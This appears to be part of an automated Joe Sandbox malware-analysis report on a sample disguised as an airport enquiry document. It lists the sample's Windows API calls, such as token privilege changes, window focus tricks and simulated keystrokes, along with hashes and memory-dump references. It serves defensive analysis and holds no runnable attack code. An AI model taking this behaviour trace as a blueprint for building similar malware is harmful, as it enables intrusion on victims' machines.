            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memmove
            • String ID:
            • API String ID: 4104443479-0
            • Opcode ID: 45d9751bc9b845b5560437cb370dc9aa8c6d3379ab14484764bb470731025edf
            • Instruction ID: 91f7a1fc5f3d7763da10cd8f356cd5e31e23918be61f1a73fc07b68cb32f5021
            • Opcode Fuzzy Hash: 45d9751bc9b845b5560437cb370dc9aa8c6d3379ab14484764bb470731025edf
            • Instruction Fuzzy Hash: 5921D270A00A09EBDB106F55E8856FE7FB8FF10790F21846AE485D2111EBB095E0E755
            APIs
              • Part of subcall function 00C84D13: FreeLibrary.KERNEL32(00000000,?), ref: 00C84D4D
              • Part of subcall function 00CA548B: __wfsopen.LIBCMT ref: 00CA5496
            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00D462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C84F6F
              • Part of subcall function 00C84CC8: FreeLibrary.KERNEL32(00000000), ref: 00C84D02
              • Part of subcall function 00C84DD0: _memmove.LIBCMT ref: 00C84E1A
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Library$Free$Load__wfsopen_memmove
            • String ID:
            • API String ID: 1396898556-0
            • Opcode ID: 089316a574793cd5477790825f6eeec9b9921e260cf117ed5be3eeb1317ef9c3
            • Instruction ID: fb96d886279115f254ae3414fab37551276b6bb9f7dafb721dccec932bdf3437
            • Opcode Fuzzy Hash: 089316a574793cd5477790825f6eeec9b9921e260cf117ed5be3eeb1317ef9c3
            • Instruction Fuzzy Hash: 73110A31600306ABCB18FF75CC12FAE77A99F44709F20842DF542E61C1DB759A05AB64
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClearVariant
            • String ID:
            • API String ID: 1473721057-0
            • Opcode ID: 0302715ac60442b929505c2c850763bc772ba153059041595cbffebca8bee6c2
            • Instruction ID: 5eeedba24650adda7d80b045483b6e84270b4f4a89d92e89a0b51857994eb467
            • Opcode Fuzzy Hash: 0302715ac60442b929505c2c850763bc772ba153059041595cbffebca8bee6c2
            • Instruction Fuzzy Hash: C52142B4508342CFDB24EF14C484B1BBBE0BF88308F09896DE8AA47721D731E855DB66
            APIs
            • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00C85807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00C85D76
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: 5897caf9abc0aeb8ab58a79c013f7aa59ced2c35d5f349d6fd3d66b6296c90d6
            • Instruction ID: 003d21b3c0bd8f9860ba13ed4de4c039ebf9f6c3c7e647240d3c1f9388988fae
            • Opcode Fuzzy Hash: 5897caf9abc0aeb8ab58a79c013f7aa59ced2c35d5f349d6fd3d66b6296c90d6
            • Instruction Fuzzy Hash: B1113A31200B019FD3309F15C584B66B7E5EF45758F10C92EE8AA87A50D7B1F945CB64
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memmove
            • String ID:
            • API String ID: 4104443479-0
            • Opcode ID: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
            • Instruction ID: 4b634a0ae7740083ce71d324d3c27dfb0cf2056aa917466a6417e8275bfc6ab1
            • Opcode Fuzzy Hash: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
            • Instruction Fuzzy Hash: 0001DFB8200542AFC305EB29C881D6AFBA9FF8A3047148119F819C7702DB70EC21CBE0
            APIs
            • __lock_file.LIBCMT ref: 00CA4AD6
              • Part of subcall function 00CA8D68: __getptd_noexit.LIBCMT ref: 00CA8D68
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __getptd_noexit__lock_file
            • String ID:
            • API String ID: 2597487223-0
            • Opcode ID: 4ffd620b6406e107f8079bb6493993bdb5ae179970c5d1f495aa333619811e18
            • Instruction ID: a721884265547d2d68d0d40b67bc7fedbad49a761f7d9212456eb7e149873f3e
            • Opcode Fuzzy Hash: 4ffd620b6406e107f8079bb6493993bdb5ae179970c5d1f495aa333619811e18
            • Instruction Fuzzy Hash: 21F0A43194020B9BDF55AFB48C063DF7661AF4272DF084514F424AA1D1CBB88E64FF55
            APIs
            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00CA09F4
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: LongNamePath
            • String ID:
            • API String ID: 82841172-0
            • Opcode ID: f4d080f305362b169fa0d243051235ae4c2e60f4ed6739982650aff3713cf986
            • Instruction ID: 3fdf78fb51014c71db710cd81f3c07bba4534240de2eb61c3c3ad4be64b6e33a
            • Opcode Fuzzy Hash: f4d080f305362b169fa0d243051235ae4c2e60f4ed6739982650aff3713cf986
            • Instruction Fuzzy Hash: CCE026339841144BEF2093A59C06BFD73A9DF53320F3643AEAC05D3106D5655913A792
            APIs
            • FreeLibrary.KERNEL32(?,?,00D462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C84FDE
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FreeLibrary
            • String ID:
            • API String ID: 3664257935-0
            • Opcode ID: ce550fd06b81f6c716322bf13c9df7c9f78ea368550905d7a2c08a6404b500af
            • Instruction ID: 3e3234ef29cbcfc2ab49e71feef56aecb224be0691a63b079eceec3eb7111551
            • Opcode Fuzzy Hash: ce550fd06b81f6c716322bf13c9df7c9f78ea368550905d7a2c08a6404b500af
            • Instruction Fuzzy Hash: DBF03071505713CFCB38AFA5D494912BBE1BF1532D3218A3EE2D682610C7719940DF54
            APIs
            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00CA09F4
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: LongNamePath_memmove
            • String ID:
            • API String ID: 2514874351-0
            • Opcode ID: 284a7d1436cff40ce45781c874e8f1d0684f2027e4365f1e609f42506a2f8990
            • Instruction ID: aaf3d1a0c848ea435817818256f56630cab555deead93347eda5cdecd8f37f9c
            • Opcode Fuzzy Hash: 284a7d1436cff40ce45781c874e8f1d0684f2027e4365f1e609f42506a2f8990
            • Instruction Fuzzy Hash: 61E0CD7690422857C720E6689C05FFA77EDDF88790F0402B6FC0CD7305E960AC818694
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __fread_nolock
            • String ID:
            • API String ID: 2638373210-0
            • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
            • Instruction ID: c73aa42afd4de480447b114fe294311fbf8fd082c5f05aedb0b42e26199b3c39
            • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
            • Instruction Fuzzy Hash: 30E092B0104B405FD7348A24D8107E373E0FB06315F00081CF2AA83341EB6278418759
            APIs
            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00CBE16B,?,?,00000000), ref: 00C85DBF
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: d568686fa7d3f7b168619a19ac8e80f5a72c1f42653fadc8b4182caed2a45c62
            • Instruction ID: 4ecbe4d73cb6c0c983c74b553925857593f5695a29c3e767c5616a01d53922f0
            • Opcode Fuzzy Hash: d568686fa7d3f7b168619a19ac8e80f5a72c1f42653fadc8b4182caed2a45c62
            • Instruction Fuzzy Hash: 34D0C774A4030CBFE710DB80DC46FA9777CD705710F200194FD0496790D6B27D508795
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __wfsopen
            • String ID:
            • API String ID: 197181222-0
            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
            • Instruction ID: 5877ff0931631079478888dce54fbdb9c21ec80df5455d38a789c00fe1ab3792
            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
            • Instruction Fuzzy Hash: 2CB0927A84020C7BDE012E82EC02A593F199B45678F808020FB0C28162A673A6A0A689
            APIs
            • GetLastError.KERNEL32(00000002,00000000), ref: 00CED46A
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorLast
            • String ID:
            • API String ID: 1452528299-0
            • Opcode ID: 9aa71172edffd4255e2898e353237289c2cf24466a0589ffbde9bedbc7ed561d
            • Instruction ID: d9608739987aafe867c3a241155a9b1b0d3832d810fcbe3f65a923aaace91829
            • Opcode Fuzzy Hash: 9aa71172edffd4255e2898e353237289c2cf24466a0589ffbde9bedbc7ed561d
            • Instruction Fuzzy Hash: AA7193342043428FC714EF65C4D1A6EB7E0AF98718F18492CF8979B2A2DB70EE05DB56
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00D0CE50
            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D0CE91
            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00D0CED6
            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D0CF00
            • SendMessageW.USER32 ref: 00D0CF29
            • _wcsncpy.LIBCMT ref: 00D0CFA1
            • GetKeyState.USER32(00000011), ref: 00D0CFC2
            • GetKeyState.USER32(00000009), ref: 00D0CFCF
            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D0CFE5
            • GetKeyState.USER32(00000010), ref: 00D0CFEF
            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D0D018
            • SendMessageW.USER32 ref: 00D0D03F
            • SendMessageW.USER32(?,00001030,?,00D0B602), ref: 00D0D145
            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00D0D15B
            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00D0D16E
            • SetCapture.USER32(?), ref: 00D0D177
            • ClientToScreen.USER32(?,?), ref: 00D0D1DC
            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00D0D1E9
            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00D0D203
            • ReleaseCapture.USER32 ref: 00D0D20E
            • GetCursorPos.USER32(?), ref: 00D0D248
            • ScreenToClient.USER32(?,?), ref: 00D0D255
            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00D0D2B1
            • SendMessageW.USER32 ref: 00D0D2DF
            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00D0D31C
            • SendMessageW.USER32 ref: 00D0D34B
            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00D0D36C
            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00D0D37B
            • GetCursorPos.USER32(?), ref: 00D0D39B
            • ScreenToClient.USER32(?,?), ref: 00D0D3A8
            • GetParent.USER32(?), ref: 00D0D3C8
            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00D0D431
            • SendMessageW.USER32 ref: 00D0D462
            • ClientToScreen.USER32(?,?), ref: 00D0D4C0
            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00D0D4F0
            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00D0D51A
            • SendMessageW.USER32 ref: 00D0D53D
            • ClientToScreen.USER32(?,?), ref: 00D0D58F
            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00D0D5C3
              • Part of subcall function 00C825DB: GetWindowLongW.USER32(?,000000EB), ref: 00C825EC
            • GetWindowLongW.USER32(?,000000F0), ref: 00D0D65F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
            • String ID: @GUI_DRAGID$F
            • API String ID: 3977979337-4164748364
            • Opcode ID: dd86bc80d349a84026075513e3e867c90f454a2974de7ff8530bfaebb5bddc97
            • Instruction ID: 3a1e3dfb86803be20a4c64ae7440417512a9d68843af9b276dbc7ca43782d519
            • Opcode Fuzzy Hash: dd86bc80d349a84026075513e3e867c90f454a2974de7ff8530bfaebb5bddc97
            • Instruction Fuzzy Hash: 6E429B74204341AFD725CF68C848BAABBE6FF49314F180619F69A876E0C731D855DBB2
            APIs
            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00D0873F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend
            • String ID: %d/%02d/%02d
            • API String ID: 3850602802-328681919
            • Opcode ID: 25b87f411ab63c45581d016981207bd0fda74b4c28a9bdfcb6819a2d21245cca
            • Instruction ID: 82d8e0a2b293a62c35ad0a9b30fb25b3684257d575850c3d1c5b365f5116a24b
            • Opcode Fuzzy Hash: 25b87f411ab63c45581d016981207bd0fda74b4c28a9bdfcb6819a2d21245cca
            • Instruction Fuzzy Hash: C512BF71500344ABEB259F64CC49FAE7BB8EF85710F244129F999EB2E1DF709941EB20
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memmove$_memset
            • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
            • API String ID: 1357608183-1798697756
            • Opcode ID: 90acd37ab5944261da828507e43ad449f219dce14aad9f6f6a2233ae34aff9fa
            • Instruction ID: 3d49a42fc670a9bd982270ed32674173896b8c09e5095ee2b6854fc94b109f72
            • Opcode Fuzzy Hash: 90acd37ab5944261da828507e43ad449f219dce14aad9f6f6a2233ae34aff9fa
            • Instruction Fuzzy Hash: 51939F71A00219DBDF24CF98C885BADB7B1FF48710F25816BEA55AB390E7709E81DB50
            APIs
            • GetForegroundWindow.USER32(00000000,?), ref: 00C84A3D
            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CBDA8E
            • IsIconic.USER32(?), ref: 00CBDA97
            • ShowWindow.USER32(?,00000009), ref: 00CBDAA4
            • SetForegroundWindow.USER32(?), ref: 00CBDAAE
            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CBDAC4
            • GetCurrentThreadId.KERNEL32 ref: 00CBDACB
            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CBDAD7
            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00CBDAE8
            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00CBDAF0
            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00CBDAF8
            • SetForegroundWindow.USER32(?), ref: 00CBDAFB
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CBDB10
            • keybd_event.USER32(00000012,00000000), ref: 00CBDB1B
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CBDB25
            • keybd_event.USER32(00000012,00000000), ref: 00CBDB2A
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CBDB33
            • keybd_event.USER32(00000012,00000000), ref: 00CBDB38
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CBDB42
            • keybd_event.USER32(00000012,00000000), ref: 00CBDB47
            • SetForegroundWindow.USER32(?), ref: 00CBDB4A
            • AttachThreadInput.USER32(?,?,00000000), ref: 00CBDB71
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
            • String ID: Shell_TrayWnd
            • API String ID: 4125248594-2988720461
            • Opcode ID: c0cd6d10962f03704c6f62887d2bd52dd5f0f39f4dad81d42472e4b6c756a024
            • Instruction ID: b61a44f24bb42738f5fff03fc1e5261768a447610d73289e497b0bded6454780
            • Opcode Fuzzy Hash: c0cd6d10962f03704c6f62887d2bd52dd5f0f39f4dad81d42472e4b6c756a024
            • Instruction Fuzzy Hash: D9317371A40318BBEB316F619C49FBE7E6CEB44B50F214025FA05EA2D0D6B15941ABB1
            APIs
              • Part of subcall function 00CD8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CD8D0D
              • Part of subcall function 00CD8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CD8D3A
              • Part of subcall function 00CD8CC3: GetLastError.KERNEL32 ref: 00CD8D47
            • _memset.LIBCMT ref: 00CD889B
            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00CD88ED
            • CloseHandle.KERNEL32(?), ref: 00CD88FE
            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00CD8915
            • GetProcessWindowStation.USER32 ref: 00CD892E
            • SetProcessWindowStation.USER32(00000000), ref: 00CD8938
            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00CD8952
              • Part of subcall function 00CD8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CD8851), ref: 00CD8728
              • Part of subcall function 00CD8713: CloseHandle.KERNEL32(?,?,00CD8851), ref: 00CD873A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
